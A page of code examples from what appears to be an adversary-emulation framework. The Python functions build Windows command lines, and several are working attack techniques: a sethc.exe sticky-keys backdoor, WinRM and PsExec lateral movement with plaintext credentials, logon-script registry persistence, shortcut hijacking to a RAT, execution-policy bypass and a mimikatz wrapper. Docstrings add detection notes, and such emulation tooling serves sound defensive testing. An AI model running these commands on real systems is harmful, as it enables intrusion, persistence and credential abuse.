コード例 #1
ファイル: static.py プロジェクト: wietze/adversary
def accessFeatA(key_id: int) -> Tuple [CommandLine, Callable[[str], None]]:
    """Build the cmd.exe command line for the accessibility-feature (sethc.exe) replacement step.

    The one-liner takes ownership of ``C:\\Windows\\System32\\sethc.exe``, grants the
    administrators group full control, renames the original to ``sethc.exe.<key_id>`` and
    copies ``cmd.exe`` over it. For detection purposes the ``takeown``/``icacls`` calls and the
    resulting ownership and hash change of ``sethc.exe`` are the artefacts this step leaves.

    Args:
        key_id: suffix appended to the backup copy of the original sethc.exe

    Returns:
        The CommandLine and ``parsers.static.accessFeat``, the parser for its output
    """
    # four chained cmd.exe commands; every path is quoted only by the outer cmd /C "..." pair
    command_line = "cmd.exe /C \"takeown /f C:\\Windows\\System32\\sethc.exe && icacls " \
                   "C:\\Windows\\System32\\sethc.exe /grant administrators:f " \
                   "&& move C:\\Windows\\System32\\sethc.exe " \
                   "C:\\Windows\\System32\\sethc.exe." + str(key_id) + " && copy C:\\Windows\\System32\\cmd.exe " \
                   "C:\\Windows\\System32\\sethc.exe\""
    return CommandLine(command_line), parsers.static.accessFeat
コード例 #2
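def dir_list(search: Union[str, list], b: bool, s: bool,
             a: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    dir_list is the "dir" command that lists the files/folders in a directory

    Args:
        search: what to list, can either be a single full path (str) or can be a list of things to search for
                within the current working directory (list)
        b: bool on if we should include the /b flag in the query (bare info, just filename)
        s: bool on if we should include the /s flag in the query (recursive)
        a: potential arguments to include with the /a flag if a is not None

    Returns:
        The CommandLine and a parser for the output of the command

    Raises:
        errors.ParserNotImplementedError: only the combined /b /s output has a parser, so any
            other switch combination is rejected instead of returning a CommandLine
    """
    args = ["cmd /c dir"]
    if isinstance(search, str):
        # single full path, e.g. dir "C:\"
        args.append('"' + search + '"')
    else:
        # list of patterns, e.g. dir *test* *files*
        # (iterate the caller's ``search`` -- the original looped over the builtin ``list``
        # type, which raised TypeError for every list input)
        args.extend('*' + word + '*' for word in search)
    if b:
        args.append('/b')
    if s:
        args.append('/s')
    if a is not None:
        args.append('/a' + a)
    # outputs of these different switches is radically different, so need different parsers for the different versions
    if b and s:
        return CommandLine(args), parsers.cmd.dir_collect
    raise errors.ParserNotImplementedError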
コード例 #3
ファイル: powershell.py プロジェクト: wietze/adversary
    def __init__(self, function_name: str, *args: PSArg) -> None:
        """Build ``self.command`` from the function name followed by the text of each PSArg."""
        arg_texts = [arg.text for arg in args]
        self.command = CommandLine([function_name] + arg_texts)
コード例 #4
def files() -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the PowerShell one-liner that restores files from their ``.old`` copies.

    For every ``*.docx``, ``*.pdf`` and ``*.xlsx`` found recursively under ``c:\\Users\\``
    the script reads the file and its ``<name>.old`` sibling, copies the bytes of the ``.old``
    copy over the start of the current file, writes the result back and deletes the ``.old``
    file. The output is handled by ``parsers.footprint.recover_files``.

    NOTE(review): only ``$key_file.Length`` bytes are copied into ``$corrupt_file``, so a
    ``.old`` copy that is longer than the current file would index past the array and a
    shorter one would leave the file's tail untouched -- confirm both files are always the
    same size.

    Returns:
        The CommandLine (the script wrapped in ``cmd /c``) and the parser for its output
    """
    command = 'powershell -command "&{$filetype = @(\\"*.docx\\",\\"*.pdf\\",\\"*.xlsx\\"); $startdir = ' \
              '\\"c:\\\\Users\\\\\\"; for($k=0;$k -lt $filetype.length; $k++){ $core = dir $startdir\($filetype[$k]) ' \
              '-Recurse | Select @{Name=\\"Path\\";Expression={$_.Fullname -as [string]}}; foreach ($alpha in $core) ' \
              '{$filename = $alpha.Path -as [string]; [Byte[]] $corrupt_file =  [System.IO.File]::ReadAllBytes(' \
              '$filename); [Byte[]] $key_file = [System.IO.File]::ReadAllBytes($(' \
              '-join($filename, \\".old\\"))); for($i=0; $i -lt $key_file.Length; $i++) { $corrupt_file[$i] = ' \
              '$key_file[$i];} [System.IO.File]::WriteAllBytes($(resolve-path $filename), $corrupt_file); ' \
              'Remove-Item $(-join($filename,\\".old\\"))}}}"'
    return CommandLine(
        'cmd /c {}'.format(command)), parsers.footprint.recover_files
コード例 #5
def delete(path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    Wrapper for the cmd.exe "del" command, which deletes a single file.

    Args:
        path: the path of the file to be deleted (wrapped in double quotes on the command line)

    Returns:
        The CommandLine and ``parsers.cmd.delete``, the parser for the output of the command
    """
    quoted_path = '"{}"'.format(path)
    return CommandLine(['cmd /c del', quoted_path]), parsers.cmd.delete
コード例 #6
def runas(user: str, program: str, args: List[str] = None) -> CommandLine:
    """
    Wrapper for the Windows runas.exe tool.

    NOTE(review): ``user`` and ``program`` are accepted but never placed on the command
    line; only ``args`` follows ``runas.exe``. Callers presumably pass the ``/user:`` switch
    and the program through ``args`` -- confirm before relying on the first two parameters.

    Args:
        user: currently unused
        program: currently unused
        args: Additional command line arguments to runas.exe

    Returns:
        The CommandLine
    """
    extra = list(args) if args else []
    return CommandLine(['runas.exe'] + extra)
コード例 #7
def copy(src_file_path: str,
         dst_file_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    Copies a file using the copy command built in to cmd.exe

    Args:
        src_file_path: The source path of the file that will be copied
        dst_file_path: The destination path of the file that will be copied

    Returns:
        The CommandLine and ``parsers.cmd.copy``, the parser for the output of the command
    """
    # both paths are double-quoted so that paths containing spaces survive cmd's parsing
    command = 'cmd /c copy "{src}" "{dst}"'.format(src=src_file_path, dst=dst_file_path)
    return CommandLine(command), parsers.cmd.copy
コード例 #8
def wmic(args: List[str]=None) -> CommandLine:
    """Wrapper for the windows tool wmic.exe

    Args:
        args: The additional arguments for the command line; None means a bare ``wmic``

    Returns:
        The CommandLine
    """
    extra = [] if args is None else list(args)
    return CommandLine(["wmic"] + extra)
コード例 #9
ファイル: xcopy.py プロジェクト: wietze/adversary
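def xcopy(args: List[str], overwrite_destination: bool) -> CommandLine:
    """Copies files and directories, including subdirectories.
    Ref: https://technet.microsoft.com/en-us/library/bb491035.aspx

    Args:
        args: Additional command line arguments to xcopy.exe. The list is copied, so the
            caller's list is never modified.
        overwrite_destination: True means overwrite the destination if it already exists (adds /y).

    Returns:
        The CommandLine
    """
    # work on a copy: the original appended '/y' to the caller's list, so a list reused
    # across calls accumulated one '/y' per call
    command_line = list(args) if args else []
    # NOTE(review): unlike the other wrappers no 'xcopy' element is prepended here, so
    # callers are presumably expected to include it in ``args`` -- confirm against call sites
    if overwrite_destination:
        command_line.append('/y')

    return CommandLine(command_line)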
コード例 #10
def tasklist(args: List[str]=None) -> CommandLine:
    """Commandline wrapper for the windows tasklist command.

    Args:
        args: Additional command line arguments; None or an empty list adds nothing

    Returns:
        The CommandLine
    """
    command_line = ['tasklist', *args] if args else ['tasklist']
    return CommandLine(command_line)
コード例 #11
def net(args: List[str]=None) -> CommandLine:
    """
    The net command is one of Windows' many swiss army knives.

    Args:
        args: Additional command line arguments to net.exe; None or an empty list adds nothing

    Returns:
        The CommandLine
    """
    parts = ['net']
    parts.extend(args or [])
    return CommandLine(parts)
コード例 #12
def powershell(
    command: str,
    parser=parsers.cmd.powershell_file
) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    Runs a Powershell query through the Windows command prompt.

    Args:
        command: the PowerShell command to run. Remember that you can separate multiple PowerShell commands with ;
        parser: parser for the command's output; defaults to ``parsers.cmd.powershell_file``

    Returns:
        The CommandLine and a parser for the output of the command
    """
    # the full command text, including -ExecutionPolicy Bypass, lands in the process command
    # line of the spawned powershell.exe, which is what process command-line auditing records
    ps_command = "powershell -ExecutionPolicy Bypass -WindowStyle Minimized -Command " + command

    # NOTE(review): the format string ends in two double quotes, so the result carries an
    # extra '"' after the closing quote (cmd /c "powershell ...""). Looks unintended; confirm
    # against callers before changing, since ``command`` itself is not escaped here either.
    return CommandLine('cmd /c \"{}\""'.format(ps_command)), parser
コード例 #13
ファイル: at.py プロジェクト: wietze/adversary
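def at(remote_host: str = None, args: List[str] = None) -> CommandLine:
    """
    Wrapper for the Windows at.exe task scheduler command.

    Args:
        remote_host: Optional host that is the target of the at command; emitted as
            ``\\\\host`` directly after ``at``, the same form the ``sc`` and ``reg`` wrappers use
        args: Additional command line arguments to at.exe. The caller's list is not modified.

    Returns:
        The CommandLine
    """

    command_line = ['at']

    if remote_host:
        # build the host element here instead of appending it to ``args``: the original
        # crashed with AttributeError when a host was given but ``args`` was None, and it
        # used a single backslash where ``sc``/``reg`` use the ``\\\\host`` form
        command_line.append('\\\\' + remote_host)

    if args:
        command_line += args

    return CommandLine(command_line)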
コード例 #14
ファイル: makecab.py プロジェクト: wietze/adversary
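def makecab(path: str = None, args: List[str] = None) -> CommandLine:
    """
    Makes a cabinet file

    Args:
        path: path to the cabinet file; omitted from the command line when None
        args: Additional command line arguments to makecab.exe

    Returns:
        The CommandLine
    """

    command_line = ['makecab']

    if path is not None:
        # append the path as one argument: the original did ``list += " " + path``, which
        # extended the list with the individual characters of the path (and raised
        # TypeError when path was None)
        command_line.append(path)

    if args:
        command_line += args

    return CommandLine(command_line)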
コード例 #15
ファイル: sc.py プロジェクト: wietze/adversary
def sc(args: List[str] = None, remote_host: str = None) -> CommandLine:
    """
    Wrapper for the windows tool sc.exe

    Args:
        args: The additional arguments for the command line
        remote_host: Optional - run on a remote host via RPC; emitted as ``\\\\host`` right after sc.exe

    Returns:
        The CommandLine
    """
    host_part = [] if remote_host is None else ['\\\\' + remote_host]
    extra = [] if args is None else list(args)
    return CommandLine(["sc.exe"] + host_part + extra)
コード例 #16
def shutdown(reboot: bool, delay: int,
             force: bool) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    Issues the command to shutdown the current computer, possibly for reboot

    Args:
        reboot: boolean if the shutdown should reboot (adds /r)
        delay: how long the computer should wait until starting to shutdown (passed via /t)
        force: boolean if the computer should force close all open programs (/f) or prompt user for input

    Returns:
        The CommandLine and ``parsers.shutdown.shutdown``, the parser for the output of the command
    """
    switches = ['/t', str(delay)]
    if reboot:
        switches.append('/r')
    if force:
        switches.append('/f')
    command = 'cmd /c shutdown ' + ' '.join(switches)
    return CommandLine(command), parsers.shutdown.shutdown
コード例 #17
def move(
        src_file_path: str, dst_file_path: str,
        suppress_overwrite: bool) -> Tuple[CommandLine, Callable[[str], None]]:
    """
    Wrapper for the cmd.exe "move" command.

    Args:
         src_file_path: path of current file
         dst_file_path: path where the new file will be
         suppress_overwrite: when True adds ``/Y``, which suppresses the confirmation prompt
             when the destination already exists (so the destination is overwritten without asking)

    Returns:
        The CommandLine and ``parsers.cmd.move``, the parser for the output of the command
    """
    move_cmd = 'move /Y' if suppress_overwrite else 'move'
    command = 'cmd /c {} "{}" "{}"'.format(move_cmd, src_file_path, dst_file_path)
    return CommandLine(command), parsers.cmd.move
コード例 #18
def lateral_movement(
        ip: str, password: str, domain: str, user: str,
        file_loc: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the PowerShell command line that runs ``file_loc`` on ``ip`` over WinRM.

    The local side adds ``ip`` to the WSMan ``TrustedHosts`` list, builds a ``PSCredential``
    for ``domain\\user`` from the plaintext ``password`` and runs ``invoke-command`` against
    ``ip``; the remote script block starts a nested ``powershell.exe -EncodedCommand`` whose
    payload is an ``Invoke-WmiMethod ... win32_process create`` call for ``file_loc``.

    From a defender's view every input is observable: the password and credential
    construction sit in the local process command line, the TrustedHosts change is a WSMan
    configuration write, and the remote process is created through WMI.

    Args:
        ip: address of the target host (also the TrustedHosts entry)
        password: plaintext password handed to convertto-securestring
        domain: Windows domain of the user account
        user: user account name
        file_loc: path, on the remote host, of the file to execute

    Returns:
        The CommandLine and ``parsers.winrm.lateral_movement``, the parser for its output
    """
    # -EncodedCommand expects base64 of the UTF-16LE encoded script text
    com = base64.b64encode(
        bytes(
            "Invoke-WmiMethod -path win32_process -name create -argumentlist '"
            + file_loc + "'", 'UTF-16LE')).decode("UTF-8")
    command_line = [
        'powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive',
        '-NoProfile', '-Command',
        '"Set-Item WSMan:localhost\\client\\trustedhosts -value ' + ip +
        '-Concatenate -Force;',
        '$pw = convertto-securestring -AsPlainText -Force -String ' +
        password + ';',
        '$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist '
        + domain + "\\" + user + ',$pw;',
        'invoke-command -computerName ' + ip + ' -credential $cred '
        '-scriptblock {' +
        'powershell.exe -ExecutionPolicy Bypass -EncodedCommand ' + com + ' }"'
    ]
    return CommandLine(command_line), parsers.winrm.lateral_movement
コード例 #19
ファイル: reg.py プロジェクト: wietze/adversary
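def reg(remote_host: str = None, args: List[str] = None) -> CommandLine:
    """
    The reg command is used to query and modify the Windows registry.

    Args:
        remote_host: The host that is the target of the reg operation; emitted as ``\\\\host``
            directly after ``reg``, as the ``sc`` wrapper does
        args: Additional command line arguments to reg.exe

    Returns:
        The CommandLine
    """

    command_line = ['reg']

    if remote_host is not None:
        # append as a single element: the original used ``list += str``, which extended the
        # list with the individual characters of "\\host"
        command_line.append("\\\\{}".format(remote_host))

    if args:
        command_line += args

    return CommandLine(command_line)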
コード例 #20
ファイル: psexec.py プロジェクト: wietze/adversary
def copy(ps_file_path: str, rat_file_path: str, user_domain: str, username: str, password: str, target: str,
         elevated: bool = True) -> Tuple[CommandLine, Callable[[str], None]]:
    """Builds a commandline for PsExec to copy and execute a file remotely

    Args:
        ps_file_path: The path to the psexec binary (becomes the first element of the command line)
        rat_file_path: The local path of the file PsExec copies to the remote computer and runs
        user_domain: The (Windows) domain of the user account
        username: The user name for the remote share, passed as ``domain\\username`` via -u
        password: The password passed via -p (required here; it appears in plaintext on the command line)
        target: The target host to run the file on, passed as ``\\\\target``
        elevated: Allows the created process to be run in an elevated context (-h)
    Returns:
        The CommandLine and ``parsers.psexec.copy``, a parser for the output
    """
    # NOTE(review): when elevated is False an empty-string element is inserted where -h
    # would be; CommandLine presumably renders it as an empty argument -- confirm it is harmless
    args = [ps_file_path, "-accepteula",
            "-u", user_domain + "\\" + username,
            "-p", password,
            "-h" if elevated else '',
            "-d", "-cv",  # PsExec switches: -d run detached, -c copy the file, -v only if newer
            rat_file_path, "\\\\" + target]

    return CommandLine(args), parsers.psexec.copy
コード例 #21
ファイル: static.py プロジェクト: wietze/adversary
def bypassB() -> Tuple [CommandLine, Callable[[str], None]]:
    """Run the fixed script ``C:\\bypassB.ps1`` with the execution policy bypassed.

    Returns:
        The CommandLine and ``parsers.static.bypassB``, the parser for its output
    """
    script_path = "C:\\bypassB.ps1"
    ps_args = ['powershell', '-executionPolicy', 'Bypass', '-file', script_path]
    return CommandLine(ps_args), parsers.static.bypassB
コード例 #22
ファイル: netstat.py プロジェクト: wietze/adversary
def netstat(args: List[str] = None) -> CommandLine:
    """Wrapper for the Windows netstat command.

    Args:
        args: Additional command line arguments; None or an empty list adds nothing

    Returns:
        The CommandLine
    """
    extra = list(args) if args else []
    return CommandLine(['netstat'] + extra)
コード例 #23
ファイル: test.py プロジェクト: wietze/adversary
def regsvr32() -> Tuple[CommandLine, Callable[[str], None]]:
    """Test command: regsvr32 with a fixed scriptlet argument.

    The switches are passed as one pre-joined string (``/s /u /i:C://Example.sct scrobj.dll``)
    rather than one element per switch as the other wrappers do; ``C://Example.sct`` appears
    to be a placeholder for the test.

    Returns:
        The CommandLine and ``parsers.test.regsvr32``, the parser for its output
    """
    switches = '/s /u /i:C://Example.sct scrobj.dll'
    return CommandLine(['regsvr32', switches]), parsers.test.regsvr32
コード例 #24
ファイル: static.py プロジェクト: wietze/adversary
def logonScriptB() -> Tuple [CommandLine, Callable[[str], None]]:
    """Write the ``UserInitMprLogonScript`` value under ``HKCU\\Environment`` with reg add.

    The value is set (``/f`` forces overwrite) to ``C:\\totally_innocent_executable.exe``.
    This registry value is a well-known logon persistence location, so a write to it is
    exactly what registry-monitoring rules key on; ``logonScriptA`` on this page exports the
    same key, presumably as a backup.

    Returns:
        The CommandLine and ``parsers.static.logonScript``, the parser for its output
    """
    key = 'HKCU\\Environment'
    value_name = 'UserInitMprLogonScript'
    value_data = 'C:\\totally_innocent_executable.exe'
    command_line = ['reg', 'add', key, '/v', value_name, '/t', 'REG_SZ', '/d', value_data, '/f']
    return CommandLine(command_line), parsers.static.logonScript
コード例 #25
ファイル: static.py プロジェクト: wietze/adversary
def shortcutmodify(target_path: str, rat_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the PowerShell command line that repoints an existing ``.lnk`` shortcut.

    The script creates a ``WScript.Shell`` COM object, opens the shortcut at ``target_path``
    and saves it with its TargetPath set to ``rat_path``. Both paths are spliced into the
    PowerShell source inside single quotes without escaping, so a quote in either value
    breaks the command. A shortcut whose TargetPath changes to an unexpected executable is
    the artefact this step leaves behind.

    Args:
        target_path: path of the shortcut (.lnk) to modify
        rat_path: path the shortcut should launch afterwards

    Returns:
        The CommandLine and ``parsers.static.shortcutmodify``, the parser for its output
    """
    command_line = ['powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command',
                    '"$SHORTCUT=\'' + target_path + '\';$TARGET=\'' + rat_path + '\';$ws = New-Object -ComObject ' +
                    'WScript.Shell; $s = $ws.CreateShortcut($SHORTCUT); $S.TargetPath = $TARGET; $S.Save()"']
    return CommandLine(command_line), parsers.static.shortcutmodify
コード例 #26
ファイル: static.py プロジェクト: wietze/adversary
def cleanupCMD(CleanCmd: str) -> Tuple [CommandLine, Callable[[str], None]]:
    """Wrap a caller-supplied cleanup command as a single-element CommandLine.

    Args:
        CleanCmd: the complete command text; it is passed through unchanged and unquoted

    Returns:
        The CommandLine and ``parsers.static.cleanup``, the parser for its output
    """
    return CommandLine([CleanCmd]), parsers.static.cleanup
コード例 #27
def password(user: str,
             password: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Set ``user``'s password with ``net user``.

    Both values are concatenated unquoted, and the new password is visible in plaintext in
    the command line of the spawned cmd.exe.

    Args:
        user: account whose password is changed
        password: the new password

    Returns:
        The CommandLine and ``parsers.footprint.password``, the parser for its output
    """
    net_user = ' '.join(['net user', user, password])
    return CommandLine('cmd /c {}'.format(net_user)), parsers.footprint.password
コード例 #28
ファイル: static.py プロジェクト: wietze/adversary
def logonScriptA() -> Tuple [CommandLine, Callable[[str], None]]:
    """Export ``HKCU\\Environment`` to ``C:\\envn.reg`` with reg export.

    Returns:
        The CommandLine and ``parsers.static.logonScript``, the parser for its output
    """
    export_args = ['export', 'HKCU\\Environment', 'C:\\envn.reg']
    return CommandLine(['reg'] + export_args), parsers.static.logonScript
コード例 #29
ファイル: mimikatz.py プロジェクト: wietze/adversary
 def __init__(self, *args: MimikatzSubcommand) -> None:
     """Join the subcommand texts into one CommandLine.

     When the first subcommand's text contains a backslash a leading ``cls`` element is
     prepended before the subcommand texts; otherwise the texts are used as-is.
     """
     texts = [sub.text for sub in args]
     prefix = ['cls'] if '\\' in args[0].text else []
     self.command = CommandLine(prefix + texts)